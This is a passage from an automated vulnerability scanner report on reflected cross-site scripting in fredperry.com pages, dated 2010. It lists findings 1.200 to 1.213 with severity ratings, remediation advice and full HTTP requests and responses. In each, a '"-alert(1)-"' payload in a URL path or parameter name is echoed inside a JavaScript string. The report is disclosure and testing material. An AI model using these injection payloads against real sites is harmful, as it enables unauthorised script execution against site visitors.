Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=1u5sk21vdignd9qge2jro4ab25; expires=Tue, 09-Nov-2010 17:15:34 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women1b902"-alert(1)-"e78c997e91a/trousers/");
//]]>
...[SNIP]...

1.200. http://www.fredperry.com/limited-edition/women/trousers/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/trousers/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3aa1"-alert(1)-"c696673324a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/trouserse3aa1"-alert(1)-"c696673324a/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:15:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=v2n0dgimikcflarir6k9fetlc1; expires=Tue, 09-Nov-2010 17:15:50 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/trouserse3aa1"-alert(1)-"c696673324a/");
//]]>
...[SNIP]...

1.201. http://www.fredperry.com/limited-edition/women/trousers/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/trousers/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 538dd"-alert(1)-"efb610e9ca5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/trousers/?538dd"-alert(1)-"efb610e9ca5=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:14:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=dehbjnf11amksjieq7m3vnflo6; expires=Tue, 09-Nov-2010 17:14:19 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30910

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/trousers/?538dd"-alert(1)-"efb610e9ca5=1");
//]]>
...[SNIP]...

1.202. http://www.fredperry.com/limited-edition/women/woven-shirts/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/woven-shirts/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 319c8"-alert(1)-"f02ad1cb55f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition319c8"-alert(1)-"f02ad1cb55f/women/woven-shirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:19:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=rigtgilqb83fphgid5aqj3mvp0; expires=Tue, 09-Nov-2010 17:19:43 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition319c8"-alert(1)-"f02ad1cb55f/women/woven-shirts/");
//]]>
...[SNIP]...

1.203. http://www.fredperry.com/limited-edition/women/woven-shirts/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/woven-shirts/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3421"-alert(1)-"f894b1a62ca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/womenc3421"-alert(1)-"f894b1a62ca/woven-shirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:20:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=j9893l7sb023k0sn5sgpfqtaf3; expires=Tue, 09-Nov-2010 17:20:07 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/womenc3421"-alert(1)-"f894b1a62ca/woven-shirts/");
//]]>
...[SNIP]...

1.204. http://www.fredperry.com/limited-edition/women/woven-shirts/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/woven-shirts/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48e5d"-alert(1)-"0ff88538cd5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/woven-shirts48e5d"-alert(1)-"0ff88538cd5/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:20:37 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ci5qr6rsv2m15begkqb1alv0a0; expires=Tue, 09-Nov-2010 17:20:37 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/woven-shirts48e5d"-alert(1)-"0ff88538cd5/");
//]]>
...[SNIP]...

1.205. http://www.fredperry.com/limited-edition/women/woven-shirts/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/woven-shirts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2c6f"-alert(1)-"871cf1c9b96 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/woven-shirts/?d2c6f"-alert(1)-"871cf1c9b96=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:18:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=571sncusi8ej2ov466ooejgm27; expires=Tue, 09-Nov-2010 17:18:00 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 35817

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/woven-shirts/?d2c6f"-alert(1)-"871cf1c9b96=1");
//]]>
...[SNIP]...

1.206. http://www.fredperry.com/men/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19550"-alert(1)-"81e975f5d42 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men19550"-alert(1)-"81e975f5d42/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 15:59:03 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=u66nlujlscjb3s1meug2h090a1; expires=Tue, 09-Nov-2010 16:59:03 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29339

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/men19550"-alert(1)-"81e975f5d42/");
//]]>
...[SNIP]...

1.207. http://www.fredperry.com/men/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15acc"-alert(1)-"28a03843a58 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men/?15acc"-alert(1)-"28a03843a58=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 15:58:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=kts7ep6obi0558q58io3rba110; expires=Tue, 09-Nov-2010 16:58:22 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33692

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Men - F
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/men/?15acc"-alert(1)-"28a03843a58=1");
//]]>
...[SNIP]...

1.208. http://www.fredperry.com/men/jackets/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/jackets/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 610d1"-alert(1)-"57514bf41f7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men610d1"-alert(1)-"57514bf41f7/jackets/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:02:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=4920voebp25nvsp534rnbf95g2; expires=Tue, 09-Nov-2010 17:02:02 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29347

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/men610d1"-alert(1)-"57514bf41f7/jackets/");
//]]>
...[SNIP]...

1.209. http://www.fredperry.com/men/jackets/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/jackets/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53f66"-alert(1)-"a580dc5b08a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men/jackets53f66"-alert(1)-"a580dc5b08a/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:02:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=s18c05vpirje707vgd46ji7t64; expires=Tue, 09-Nov-2010 17:02:18 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29347

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/men/jackets53f66"-alert(1)-"a580dc5b08a/");
//]]>
...[SNIP]...

1.210. http://www.fredperry.com/men/jackets/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/jackets/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dba1b"-alert(1)-"17a5fe70f88 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men/jackets/?dba1b"-alert(1)-"17a5fe70f88=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:00:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=g1cqvnmjficp28jpl36upauge2; expires=Tue, 09-Nov-2010 17:00:39 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47179

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Men's J
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/men/jackets/?dba1b"-alert(1)-"17a5fe70f88=1");
//]]>
...[SNIP]...

1.211. http://www.fredperry.com/men/knitwear/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/knitwear/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a64af"-alert(1)-"3a1a3b3a61c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mena64af"-alert(1)-"3a1a3b3a61c/knitwear/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:01:30 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=u37p1ocep3e9f3icao3s3icac4; expires=Tue, 09-Nov-2010 17:01:31 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/mena64af"-alert(1)-"3a1a3b3a61c/knitwear/");
//]]>
...[SNIP]...

1.212. http://www.fredperry.com/men/knitwear/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/knitwear/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b4c2"-alert(1)-"ba5b05c538c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men/knitwear6b4c2"-alert(1)-"ba5b05c538c/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:01:57 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=64rrfdccnav5m7b6pccdkibtl1; expires=Tue, 09-Nov-2010 17:01:57 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/men/knitwear6b4c2"-alert(1)-"ba5b05c538c/");
//]]>
...[SNIP]...

1.213. http://www.fredperry.com/men/knitwear/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/knitwear/

Issue detail

